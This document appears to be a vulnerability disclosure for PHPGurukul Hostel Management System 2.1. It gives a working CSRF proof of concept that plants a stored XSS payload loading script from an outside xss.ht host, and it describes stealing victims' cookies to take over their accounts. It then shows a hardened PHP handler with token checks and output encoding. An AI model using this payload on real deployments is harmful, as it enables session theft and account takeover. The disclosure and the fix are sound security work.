# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-Site Request Forgery (CSRF) to Cross-Site Scripting (XSS)
# Date: 2021-10-27
# Exploit Author: Anubhav Singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php
# Tested on: Windows 10, XAMPP
Steps to reproduce:
1) Navigate to http://localhost/hostel/hostel/my-profile.php
2) Enter the XSS payload "><script src=https://anubhav1403.xss.ht></script> in the name field
3) Click on Update Profile and intercept the request in Burp Suite
4) Generate a CSRF PoC of the Update Profile request
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/hostel/hostel/my-profile.php" method="POST">
<input type="hidden" name="regno" value="123456" />
<!-- the payload is entity-encoded so the whole string is submitted as the fname value -->
<input type="hidden" name="fname" value="&quot;&gt;&lt;script src=https://anubhav1403.xss.ht&gt;&lt;/script&gt;" />
<input type="hidden" name="mname" value="Hello" />
<input type="hidden" name="lname" value="Singh" />
<input type="hidden" name="gender" value="male" />
<input type="hidden" name="contact" value="12345678995" />
<input type="hidden" name="email" value="anubhav@gmail.com" />
<input type="hidden" name="update" value="Update Profile" />
<input type="submit" value="Submit request" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
```
5) Send this PoC to the victim
6) When the victim opens the PoC, his/her name is updated to our XSS payload and the payload fires.
7) The attacker now gets the victim's details, such as IP address and cookies.
8) So the attacker is able to steal the victim's cookies successfully: account takeover!
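The chain above works because my-profile.php accepts the update without any anti-CSRF token and then renders the stored name without output encoding. The handler below is an added example (not PHPGurukul's code) of a version that breaks both links; the field names come from the PoC, while csrf_token, the session keys, the cookie flags and the placeholder table name are assumptions.

```php
<?php
// Added example, not PHPGurukul's code: a hardened profile-update handler.
// HttpOnly blunts cookie theft via script; SameSite=Lax stops the cross-site
// auto-submitting POST from carrying the session cookie in most browsers.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// One anti-CSRF token per session; the legitimate form echoes it in a hidden
// field, which a form hosted on another origin cannot read or predict.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Constant-time comparison of the submitted token against the session's copy.
function csrf_token_is_valid(array $post, array $session): bool
{
    return isset($post['csrf_token'], $session['csrf_token'])
        && hash_equals($session['csrf_token'], (string) $post['csrf_token']);
}

// Output-encode everything user-controlled before it lands in HTML; the
// "><script ...></script> payload becomes inert text instead of a script tag.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$fname = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['update'])) {
    if (!csrf_token_is_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    $fname = trim((string) ($_POST['fname'] ?? ''));
    // Persist with a prepared statement, bound to the logged-in user's regno
    // from the session (not a posted regno). Table/column names are placeholders:
    // $stmt = $pdo->prepare('UPDATE <profile_table> SET fname = ? WHERE regno = ?');
    // $stmt->execute([$fname, $_SESSION['regno']]);
}
?>
<form action="my-profile.php" method="POST">
  <input type="hidden" name="csrf_token" value="<?= h($_SESSION['csrf_token']) ?>">
  <input type="text" name="fname" value="<?= h($fname) ?>">
  <input type="submit" name="update" value="Update Profile">
</form>
```

Replaying the PoC form against this handler returns 403 before any write happens, and even a name already stored with the payload is rendered as literal text by h().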
# PoC